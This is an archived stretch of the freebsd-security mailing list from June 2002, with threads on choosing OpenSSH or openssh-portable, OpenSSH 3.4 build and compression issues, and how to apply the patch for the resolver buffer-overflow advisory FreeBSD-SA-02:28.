-a=20 > sshd2: SSH Secure Shell 3.2.0 (non-commercial version) on > i386-unknown-freebsd4.6 interesting, indeed. what os are you using, if i may ask, sir? ;-) /k --=20 > I'm not as think as you stoned I am. WebMonster Community Project -- Reliable and quick since 1998 -- All on BSD http://www.webmonster.de/ - ftp://ftp.webmonster.de/ - http://www.rohrbach.= de/ GnuPG: 0xDEC948A6 D/E BF11 83E8 84A1 F996 68B4 A113 B393 6BF4 DEC9 48A6 REVOKED: 0x2964BF46 D/E 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46 REVOKED: 0x4C44DA59 RSA F9 A0 DF 91 74 07 6A 1C 5F 0B E0 6B 4D CD 8C 44 My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/ Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --AqsLC8rIMeq19msA Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Comment: For info see http://www.gnupg.org iD8DBQE9G6nls5Nr9N7JSKYRAngBAJ9wcp4Q5dJGn8Dc7rcU/eMjUQITpgCfad0p u/Yg/YisxdEtZV9XHWdTTE8= =+oqZ -----END PGP SIGNATURE----- --AqsLC8rIMeq19msA-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 17:50:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from thufir.bluecom.no (thufir.bluecom.no [217.118.32.12]) by hub.freebsd.org (Postfix) with ESMTP id F1A2337B406 for ; Thu, 27 Jun 2002 17:49:42 -0700 (PDT) Received: from dus (dell.sandakeronline.com [217.118.33.65]) by thufir.bluecom.no (8.11.5/8.11.5) with SMTP id g5S09Y324096; Fri, 28 Jun 2002 02:09:35 +0200 Message-ID: <002501c21e38$1be59db0$0201a8c0@dus> From: =?iso-8859-1?Q?Arvinn_L=F8kkebakken?= To: "JP Villa (Datafull.com)" , "Dag-Erling Smorgrav" Cc: References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> Subject: Re: Re[2]: openssh OR openssh-portable Date: Fri, 28 Jun 2002 02:09:44 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > "JP Villa (Datafull.com)" writes: > > I think the original question was pointing to this too, > > so I rephrase: openssh or openssh-portable? or maybe > > openssh 3.4 properly merged on a production codebase? and > > in that case, when? > > In my opinion, the latter is the best option, but it's your machine > and your call. Jacques Vidrine has the final word in this matter, and > I can't speak for him, but I expect 3.4 will hit -STABLE (and > hopefully the security branches) sometime next week. > I still don't understand the difference. According to the OpenSSH's website the portable version is for other operating systems (than OpenBSD i assume). Why is it then possible to use the "not portable" version of OpenSSH on FreeBSD? "Managing the distribution of OpenSSH is split into two teams. One team does strictly OpenBSD-based development, aiming to produce code that is as clean, simple, and secure as possible. The other team takes the clean version and makes it portable, so that it will run on many operating systems (these are known as the p releases, and named like "OpenSSH 3.3p1"). Please click on the provided link for your operating system." By reading this I understand that the p release (openssh-portable) is not as clean as the other one. What are the benefits running the p release on FreeBSD systems when both releases works? This is rather confusing for a newbie like me. Sorry if I'm bothering everyone by asking questions that has been answered a billion times before. Arvinn To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 18:14:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by hub.freebsd.org (Postfix) with ESMTP id 319A637B41D for ; Thu, 27 Jun 2002 18:14:02 -0700 (PDT) Received: (qmail 2388 invoked by uid 1000); 28 Jun 2002 01:07:17 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 28 Jun 2002 01:07:17 -0000 Date: Thu, 27 Jun 2002 18:07:17 -0700 (PDT) From: Jason Stone X-X-Sender: To: =?iso-8859-1?Q?Arvinn_L=F8kkebakken?= Cc: Subject: Re: Re[2]: openssh OR openssh-portable In-Reply-To: <002501c21e38$1be59db0$0201a8c0@dus> Message-ID: <20020627180217.X2226-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > I still don't understand the difference. According to the OpenSSH's > website the portable version is for other operating systems (than > OpenBSD i assume). Why is it then possible to use the "not portable" > version of OpenSSH on FreeBSD? We were able to use the native openbsd version because freebsd is close enough to openbsd that little patching was necesary. > By reading this I understand that the p release (openssh-portable) is not as > clean as the other one. What are the benefits running the p release on > FreeBSD systems when both releases works? OpenBSD doesn't use pam, and therefor openssh native doesn't either. Since most other systems _do_ use pam, openssh-portable does. FreeBSD uses pam, so it seems to make the most sense to just use openssh portable. -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE9G7bFswXMWWtptckRApifAJwPAR11iEKbvhUOO4K9VaRJIAIlCACfYlz4 CrnIvxyT5Vqsq3v0USLHD+M= =tpFy -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 18:41:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 1D5D337B401 for ; Thu, 27 Jun 2002 18:41:41 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA21547; Thu, 27 Jun 2002 18:54:43 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020627185259.03846f00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Thu, 27 Jun 2002 18:54:13 -0600 To: Jan Lentfer , pjklist@ekahuna.com From: Brett Glass Subject: Re: Installing openssh-portable 3.4 Cc: FreeBSD Security Mailling List In-Reply-To: <1025211566.2815.110.camel@jan-linux.lan> References: <20020627103110488.AAA796@empty1.ekahuna.com@pc02.ekahuna.com> <20020627103110488.AAA796@empty1.ekahuna.com@pc02.ekahuna.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 02:59 PM 6/27/2002, Jan Lentfer wrote: >I used > >#make -DOPENSSH_OVERWRITE_BASE >#make -DOPENSSH_OVERWRITE_BASE install > >... and it worked just fine You can also do make -DOPENSSH_OVERWRITE_BASE package and add the resulting package to affected machines. Highly recommended for folks who (like me) don't want to keep ports rotating on every machine. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 18:42:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id B3C0837B400 for ; Thu, 27 Jun 2002 18:41:42 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id TAA21642; Thu, 27 Jun 2002 19:09:17 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020627190406.024a04f0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Thu, 27 Jun 2002 19:09:05 -0600 To: Arvinn Løkkebakken , "JP Villa (Datafull.com)" , "Dag-Erling Smorgrav" From: Brett Glass Subject: Re: Re[2]: openssh OR openssh-portable Cc: In-Reply-To: <002501c21e38$1be59db0$0201a8c0@dus> References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 06:09 PM 6/27/2002, Arvinn Løkkebakken wrote: >"Managing the distribution of OpenSSH is split into two teams. One team does >strictly OpenBSD-based development, aiming to produce code that is as clean, >simple, and secure as possible. The other team takes the clean version and >makes it portable, so that it will run on many operating systems (these are >known as the p releases, and named like "OpenSSH 3.3p1"). Please click on >the provided link for your operating system." > >By reading this I understand that the p release (openssh-portable) is not as >clean Unfortunately, the definition of "clean" here seems to really mean "OpenBSD-specific and non-portable." I don't agree with this definition. As a rule, portable code is usually better tested and therefore "cleaner" in that sense. The only thing which is really "unclean" about the portable version is licensing: it uses GNU configure. I really wish it didn't. At least the OpenSSH code itself is truly free. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 18:48:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id 07BFD37B400 for ; Thu, 27 Jun 2002 18:47:45 -0700 (PDT) Received: (qmail 17753 invoked by uid 1001); 28 Jun 2002 01:21:01 -0000 Date: Thu, 27 Jun 2002 21:21:01 -0400 From: "Peter C. Lai" To: William Wong Cc: Andrew McNaughton , freebsd-security@freebsd.org Subject: Re: openssh and compression Message-ID: <20020627212101.A17738@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <20020628113815.I2363-100000@a2> <000601c21e36$897ad130$0300a8c0@anime.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <000601c21e36$897ad130$0300a8c0@anime.ca>; from willwong@samurai.com on Thu, Jun 27, 2002 at 07:58:29PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please read this: http://docs.freebsd.org/cgi/getmsg.cgi?fetch=1244997+0+current/freebsd-security In short Koga Youichirou mentioned a syntax error in sys/mman.h this affects 3.4p1 On Thu, Jun 27, 2002 at 07:58:29PM -0400, William Wong wrote: > I had this happen too, but it was on a Redhat 6.2 system. I haven't figured > out what's causing it though...Odd thing was that 3.3p1 didn't even run > properly at least 3.4 does! > > - Will > > ----- Original Message ----- > From: "Andrew McNaughton" > To: > Sent: Thursday, June 27, 2002 7:44 PM > Subject: openssh and compression > > > > > > The other day I installed openssh-portable-3.3p1. It ran quite nicely, > > apparently including privilege separation and compression. > > > > that is to say I could see that processes with reduced privileges were > > being run, and connectionswith 'ssh -v' worked and reported that > > compression was being used. > > > > Now I install openssh-portable-3.4p1 and when I start the daemon it tells > > me: > > > > This platform does not support both privilege separation and compression > > Compression disabled > > > > Is this simply a problem with the way the configuration works itself out, > > or is there a real problem with supporting compression? > > > > Andrew McNaughton > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 19:38:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from server1.newzealandhosting.com (juicyhoes.com [64.49.223.235]) by hub.freebsd.org (Postfix) with ESMTP id 3BC6A37B400 for ; Thu, 27 Jun 2002 19:38:21 -0700 (PDT) Received: from bigfoot (c16468.kelvn1.qld.optusnet.com.au [210.49.46.87]) by server1.newzealandhosting.com (Postfix) with ESMTP id A07A91084D6 for ; Thu, 27 Jun 2002 16:26:43 -0500 (CDT) Message-ID: <200206281235440931.5B17C74F@zorgco.com> In-Reply-To: <200206261908.g5QJ8Nqo035419@freefall.freebsd.org> References: <200206261908.g5QJ8Nqo035419@freefall.freebsd.org> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Fri, 28 Jun 2002 12:35:44 +1000 From: "Chris" To: security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry for the newbie question but here goes. Anyone know if we can just recompile kernel after patch? (i.e make make= install) or do we have to update src and make world? Any help is greatly appreciated. Chris ------------------------------------------------------------------- On 26/06/2002 at 12:08 PM FreeBSD Security Advisories wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D >FreeBSD-SA-02:28.resolv Security >Advisory > The FreeBSD >Project > >Topic: buffer overflow in resolver > >Category: core >Module: libc >Announced: 2002-06-26 >Credits: Joost Pol >Affects: All releases prior to and including 4.6-RELEASE >Corrected: 2002-06-26 06:34:18 UTC (RELENG_4) > 2002-06-26 08:44:24 UTC (RELENG_4_6) > 2002-06-26 18:53:20 UTC (RELENG_4_5) >FreeBSD only: NO > >I. Background > >The resolver implements functions for making, sending and interpreting >query and reply messages with Internet domain name servers. >Hostnames, IP addresses, and other information are queried using the >resolver. > >II. Problem Description > >DNS messages have specific byte alignment requirements, resulting in >padding in messages. In a few instances in the resolver code, this >padding is not taken into account when computing available buffer >space. As a result, the parsing of a DNS message may result in a >buffer overrun of up to a few bytes for each record included in the >message. > >III. Impact > >An attacker (either a malicious domain name server or an agent that >can spoof DNS messages) may produce a specially crafted DNS message >that will exploit this bug when parsed by an application using the >resolver. It may be possible for such an exploit to result in the >execution of arbitrary code with the privileges of the resolver-using >application. Though no exploits are known to exist today, since >practically all Internet applications utilize the resolver, the >severity of this issue is high. > >IV. Workaround > >There is currently no workaround. > >V. Solution > >Do one of the following: > >1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6 >or RELENG_4_5 security branch dated after the correction date >(4.6-RELEASE-p1 or 4.5-RELEASE-p7). > >2) To patch your present system: > >The following patch has been verified to apply to FreeBSD 4.5 and >FreeBSD 4.6 systems. > >a) Download the relevant patch from the location below, and verify the >detached PGP signature using your PGP utility. > ># fetch >ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch ># fetch >ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch.asc > >b) Execute the following commands as root: > ># cd /usr/src ># patch < /path/to/patch > >c) Recompile the operating systems as described in >. > >Note that any statically linked applications that are not part of >the base system (i.e. from the Ports Collection or other 3rd-party >sources) must be recompiled. > >VI. Correction details > >The following list contains the revision numbers of each file that was >corrected in FreeBSD. > >Path Revision > Branch >-= ------------------------------------------------------------------------- >src/lib/libc/net/gethostbydns.c > RELENG_4 1.27.2.2 > RELENG_4_6 1.27.10.1 > RELENG_4_5 1.27.8.1 >src/lib/libc/net/getnetbydns.c > RELENG_4 1.13.2.2 > RELENG_4_6 1.13.2.1.8.1 > RELENG_4_5 1.13.2.1.6.1 >src/lib/libc/net/name6.c > RELENG_4 1.6.2.6 > RELENG_4_6 1.6.2.5.8.1 > RELENG_4_5 1.6.2.5.6.1 >src/sys/conf/newvers.sh > RELENG_4_6 1.44.2.23.2.2 > RELENG_4_5 1.44.2.20.2.8 >-= ------------------------------------------------------------------------- > >VII. References > > >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.0.7 (FreeBSD) > >iQCVAwUBPRoQOVUuHi5z0oilAQG3cAP/d7Gb2rdkSjZKCR0NI+QzMibgySVTXOtF >sdoJrYka/XnIpFMVAyXl36bibtRKbwfCyv/rEX39YSas7tqReizwAABoaRF956Qb >qlek1ONvvd+Tj6+WpEEueX/VdPqGQuqMk0BoguIbOgwAya6ZFYJ9ZKAHHSN9YqO8 >ZGTC8pmqfGI=3D >=3Ds76v >-----END PGP SIGNATURE----- > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security-notifications" in the body of the= message Chris Zorg Enterprises To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 22:57: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1FBC637B401 for ; Thu, 27 Jun 2002 22:56:58 -0700 (PDT) Received: from mail.voljatel.si (mail.voljatel.si [217.72.64.15]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3AC6443E06 for ; Thu, 27 Jun 2002 22:56:57 -0700 (PDT) (envelope-from damir@voljatel.si) Received: from pxna.hide.voljatel.si (pehta.voljatel.si [217.72.64.8]) by mail.voljatel.si (Postfix) with SMTP id 41A9D53505 for ; Fri, 28 Jun 2002 07:56:39 +0200 (CEST) Date: Fri, 28 Jun 2002 07:57:06 +0200 From: Damir Horvat To: freebsd-security@freebsd.org Subject: openssh port 3.4,1 Message-Id: <20020628075706.44bef8be.damir@voljatel.si> Organization: Voljatel telekomunikacije d.d. X-Mailer: Sylpheed version 0.7.8 (GTK+ 1.2.10; i386-portbld-freebsd4.6) X-Operating-System: home brewed unix Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Today cvsuped openssh source produce this error when compiling: installing tools... installing libcrypto.a installing libssl.a installing libRSAglue.a ===> Generating temporary packing list usage: mkdir [-pv] [-m mode] directory ... *** Error code 64 Stop in /usr/ports/security/openssl. *** Error code 1 Regards, Damir Horvat To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 23:12: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0790C37B4FD for ; Thu, 27 Jun 2002 23:11:38 -0700 (PDT) Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by mx1.FreeBSD.org (Postfix) with SMTP id 8BE2443E06 for ; Thu, 27 Jun 2002 23:11:36 -0700 (PDT) (envelope-from roam@ringlet.net) Received: (qmail 8336 invoked by uid 85); 28 Jun 2002 06:23:28 -0000 Received: from unknown (HELO straylight.ringlet.net) (212.116.140.125) by south.nanolink.com with SMTP; 28 Jun 2002 06:23:25 -0000 Received: (qmail 16876 invoked by uid 1000); 28 Jun 2002 06:10:17 -0000 Date: Fri, 28 Jun 2002 09:10:17 +0300 From: Peter Pentchev To: peter.lai@uconn.edu Cc: William Wong , Andrew McNaughton , freebsd-security@freebsd.org Subject: Re: openssh and compression Message-ID: <20020628061017.GD384@straylight.oblivion.bg> Mail-Followup-To: peter.lai@uconn.edu, William Wong , Andrew McNaughton , freebsd-security@freebsd.org References: <20020628113815.I2363-100000@a2> <000601c21e36$897ad130$0300a8c0@anime.ca> <20020627212101.A17738@cowbert.2y.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="2Z2K0IlrPCVsbNpk" Content-Disposition: inline In-Reply-To: <20020627212101.A17738@cowbert.2y.net> User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --2Z2K0IlrPCVsbNpk Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jun 27, 2002 at 09:21:01PM -0400, Peter C. Lai wrote: > On Thu, Jun 27, 2002 at 07:58:29PM -0400, William Wong wrote: > > I had this happen too, but it was on a Redhat 6.2 system. I haven't fi= gured > > out what's causing it though...Odd thing was that 3.3p1 didn't even run > > properly at least 3.4 does! >=20 > Please read this: > http://docs.freebsd.org/cgi/getmsg.cgi?fetch=3D1244997+0+current/freebsd-= security >=20 > In short Koga Youichirou mentioned a syntax error in sys/mman.h >=20 > this affects 3.4p1 Just to clarify: this is not a syntax error in the FreeBSD system header file, but an omission in the OpenSSH configure script; programs using are supposed to include the header file before that, which the test program does not do. G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 The rest of this sentence is written in Thailand, on --2Z2K0IlrPCVsbNpk Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9G/3J7Ri2jRYZRVMRAnNVAJ9PZmKdAc+Wnxl8EcVnCFBh3dYKyACgroox crg9qi7XXD7Mx+UI56qPAro= =HMpj -----END PGP SIGNATURE----- --2Z2K0IlrPCVsbNpk-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 23:13:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1CAB437B405 for ; Thu, 27 Jun 2002 23:13:02 -0700 (PDT) Received: from mailb.telia.com (mailb.telia.com [194.22.194.6]) by mx1.FreeBSD.org (Postfix) with ESMTP id AFE2C43E0A for ; Thu, 27 Jun 2002 23:13:00 -0700 (PDT) (envelope-from erikt@midgard.homeip.net) Received: from d1o913.telia.com (d1o913.telia.com [195.252.44.241]) by mailb.telia.com (8.11.6/8.11.6) with ESMTP id g5S6CwS04144 for ; Fri, 28 Jun 2002 08:12:59 +0200 (CEST) Received: from falcon.midgard.homeip.net (h53n2fls20o913.telia.com [212.181.163.53]) by d1o913.telia.com (8.8.8/8.8.8) with SMTP id IAA18632 for ; Fri, 28 Jun 2002 08:12:58 +0200 (CEST) Received: (qmail 9671 invoked by uid 1001); 28 Jun 2002 06:12:56 -0000 Date: Fri, 28 Jun 2002 08:12:56 +0200 From: Erik Trulsson To: Chris Cc: security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020628061255.GA9616@falcon.midgard.homeip.net> Mail-Followup-To: Chris , security@freebsd.org References: <200206261908.g5QJ8Nqo035419@freefall.freebsd.org> <200206281235440931.5B17C74F@zorgco.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206281235440931.5B17C74F@zorgco.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 28, 2002 at 12:35:44PM +1000, Chris wrote: > > Sorry for the newbie question but here goes. > > Anyone know if we can just recompile kernel after patch? (i.e make > make install) or do we have to update src and make world? > > Any help is greatly appreciated. > > Chris The kernel is actually not affected by this. It is libc that needs to be recompiled (as well as any programs that are statically linked with it.) The easiest way to accomplish this is a 'make world' -- Erik Trulsson ertr1013@student.uu.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 0:19:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9212737B401 for ; Fri, 28 Jun 2002 00:19:50 -0700 (PDT) Received: from viking.drweb.ru (sald.ipnet.spb.ru [62.16.103.217]) by mx1.FreeBSD.org (Postfix) with ESMTP id 65B4B43E0B for ; Fri, 28 Jun 2002 00:19:49 -0700 (PDT) (envelope-from nikolaj@viking.drweb.ru) Received: from viking.drweb.ru (localhost [127.0.0.1]) by viking.drweb.ru (8.12.5/8.12.5) with ESMTP id g5S7K72h008492 for ; Fri, 28 Jun 2002 11:20:07 +0400 (MSD) (envelope-from nikolaj@viking.drweb.ru) Received: (from nikolaj@localhost) by viking.drweb.ru (8.12.5/8.12.3/Submit) id g5S7K60C008491 for freebsd-security@freebsd.org; Fri, 28 Jun 2002 11:20:06 +0400 (MSD) Date: Fri, 28 Jun 2002 11:20:06 +0400 From: "Nikolaj I. Potanin" To: freebsd-security@freebsd.org Subject: Re: openssh port 3.4,1 Message-ID: <20020628072006.GA8401@drweb.ru> References: <20020628075706.44bef8be.damir@voljatel.si> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: <20020628075706.44bef8be.damir@voljatel.si> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, just check out mkdir's commant line option in Makefile. It seems to be uncompatible with your current mkdir. > installing tools... > installing libcrypto.a > installing libssl.a > installing libRSAglue.a > ===> Generating temporary packing list > usage: mkdir [-pv] [-m mode] directory ... > *** Error code 64 > > Stop in /usr/ports/security/openssl. > *** Error code 1 -- Nikolaj I. Potanin http://www.drweb.ru ID Anti-Virus Lab (SalD Ltd) nikolaj@drweb.ru St. Petersburg, Russia ph.: +7-812-3888624 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 1:39:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0E8F237B401 for ; Fri, 28 Jun 2002 01:39:41 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8881343E06 for ; Fri, 28 Jun 2002 01:39:40 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id D4AA45361; Fri, 28 Jun 2002 10:39:36 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Arvinn =?iso-8859-1?q?L=F8kkebakken?= Cc: "JP Villa (Datafull.com)" , Subject: Re: Re[2]: openssh OR openssh-portable References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> <002501c21e38$1be59db0$0201a8c0@dus> From: Dag-Erling Smorgrav Date: 28 Jun 2002 10:39:35 +0200 In-Reply-To: <002501c21e38$1be59db0$0201a8c0@dus> Message-ID: Lines: 18 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Arvinn L=F8kkebakken writes: > I still don't understand the difference. According to the OpenSSH's websi= te > the portable version is for other operating systems (than OpenBSD i assum= e). > Why is it then possible to use the "not portable" version of OpenSSH on > FreeBSD? Because FreeBSD and OpenBSD aren't really all that different. > By reading this I understand that the p release (openssh-portable) is not= as > clean as the other one. What are the benefits running the p release on > FreeBSD systems when both releases works? OpenSSH-portable has better support for some things (like PAM and Kerberos V) that FreeBSD has but OpenBSD doesn't. DES --=20 Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 2:13:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0FDAD37B405 for ; 